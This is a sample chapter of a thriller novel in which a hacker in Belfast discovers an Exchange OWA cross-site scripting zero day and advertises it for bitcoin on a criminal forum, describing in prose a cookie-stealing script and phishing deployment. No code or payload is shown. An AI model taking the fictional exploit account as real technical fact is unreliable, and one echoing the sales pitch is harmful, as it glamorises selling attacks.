Select Page

Turlach Flanagan: Zero Day

Enjoy this sample Virus Bomb chapter about how Turlach Flanagan finds a zero day exploit and then markets and sells it. A zero day is the title we give to new software bugs attackers can use to exploit security vulnerabilities. Zero days command a premium price in a thriving criminal underground marketplace because potential attackers are often willing to outbid software company bug bounties. The mastermind behind the Elaine Devereux persona is one such potential attacker.

Zero Day

The candlelight gave Turlach Flanagan’s room above a pub in Belfast, Northern Ireland, a rustic feel, even though it was crammed with computer equipment. “You’re knackered,” he shouted and pounded his desk. He leaned back in his chair and rubbed his eyes. But what else besides Irish whiskey could numb the pain after losing his family during the troubles after the Irish Troubles?

He rose from his desk and staggered to his bathroom. The image in the mirror, with deep bags under his bloodshot eyes and greasy, grey hair, mostly pulled back and tied off into a ponytail with a rubber band, looked more like a homeless refugee than a former college professor.

How does your mind still function?

But maybe his mind wasn’t functioning so well after all.

He lurched back to his desk and stared at his work in progress. The laptop screen, Microsoft Exchange reference books, hand-drawn flow diagrams, code listings, and empty shot glasses all mocked him. He swept his arm across the desk, sending it all crashing to the floor. A lit candle also went flying, landing on the floor in the middle of all that paper. It smoldered and then ignited.

“You nappy arwshe, maybe it’s time to get it over with.”

Like a scientist monitoring an experiment, he watched the flames consume a few papers and then a notebook and now some newspapers. The carpet smoldered and plastic jewel cases around a few CDs started to melt, filling the room with acrid smoke. Would one hundred proof Irish whiskey put it out or make it worse?

He grabbed his last remaining unopened bottle, twisted off the cap, downed a swig, and then poured it over the growing flames. “Ow!” The flames jumped and singed his hand.

“You’re a flaming eejit, but it’s not time to die in a ball o’ fire yet!”

He ran back to his bathroom and filled a bucket with water. He ran back and poured it on the flames.

The flames hissed and smoked and then subsided as the water spread across the black spot on the carpeted floor, leaving a pile of wet paper and ashes and a smoky distillery aroma in the air.

He tipped the bottle back to finish it off and then dropped it in the middle of the wet mess and teetered to his bed.

“You’re a manky neddy!” he mumbled as he drifted into a fitful sleep.

Five hours later, the room still smelled like smoke, which didn’t help his growing headache. He swung his feet to the floor, rubbed his eyes, stood, and opened a window. A few birds chirped outside, announcing predawn of another miserable day on this miserable little planet. He staggered to his now-empty work desk and surveyed the damage from last night. “Serves ya right, ya mongo sap.”

He picked up his laptop from the edge of the booze-soaked pile of papers on the floor and dried the bottom with his body-odor-stained shirt. He pressed the power button and waited. After a few seconds, it showed the familiar, “Press CTRL + ALT + DELETE to logon.”

“A rake of good luck,” he mumbled. “Now, stop arsing around, and let’s find what we’re looking for.”

A few hours later, Turlach leaned back in his chair, ran a hand through his greasy hair, wiped it on his shirt, and smiled. The “Hello World” window on his laptop screen wasn’t important. What was important was the method he came up with to generate that little picture. The sunlight made his head hurt. And he needed to use the bathroom. He didn’t care. Not yet.

Document what we have first. He launched Notepad and composed a first draft of an ad he would post on an underground internet forum. The ad read:

A new zero-day XSS exploit with Microsoft Exchange. Launch OWA, log on, and compose a new message. Put a specially crafted string in the ‘bcc’ field to run a local script of your choice. Requires phishing to intercept the initial logon to deploy your payload script. $30K in bitcoin, including consulting to implement. I will provide a sample script to grab the user’s cookie and upload to Dropbox. You can modify as appropriate. Serious buyers only.

Turlach stared at the ad text for a few minutes before clicking the “Submit” button to post it. He smiled. Which made the hammer inside his head pound even harder. But no matter. If successful, this exploit would pay for all new computer equipment and more.

Now he could pee. He returned a few minutes later with a glass of orange juice. Responses were already coming in.

One response, from somebody named John, was typical: “Give me more information. How would this work?”

Turlach shook his head. “Idiots!” But if he wanted the money for the exploit he discovered, it was obvious he’d have to spell it out to these neddies. Thirty minutes later, his next post summed it up:

For all you newbies, a zero-day exploit is one that hasn’t been discovered yet by the software vendor. OWA, or Outlook Web App, is the Microsoft webmail function that comes with Microsoft Exchange Server. The exploit I discovered allows you to use OWA to run an arbitrary script on your computer if you place a specially formatted string in the bcc field. This script could upload a cookie with authentication information, or it could access your email and calendars, or it could upload documents from your profile. Or it could do anything else you want, limited only by your primitive imaginations. I provided a sample script to upload a cookie. You can use my sample to build something more elaborate if you want. Or pay me to do it. The object, of course, is not to run the script on your computer. The object is to entice somebody else to run it on his computer and send every important piece of information about his pitiful life to you. To take advantage of my exploit, you need to convince your targeted user to run the program I wrote to deploy your script. That’s why it requires phishing. And I’ll also answer your next obvious question. No, your targeted users will not see the string my program injects into the bcc field because the string contains nonprintable characters.

#####

In Tehran, 6,200 kilometers away, the mastermind behind the Elaine Devereux persona spotted the ad while scouring the usual forums. He stroked his chin. Yes, this could be useful.

Note to readers

Turlach Flanagan, AKA Livefree is one player in a global criminal supply chain of venture capitalists, integrators, and specialists, all connected over the internet. If you want to attack a country or plunder a business, Turlach, or somebody like him, has the tools you need, if you know where to look. Just make sure you offer the right price. Be prepared to haggle.

Curious about what 100 proof Irish Whiskey will do to a fire? Enjoy this video I made with my grandsons in early 2018.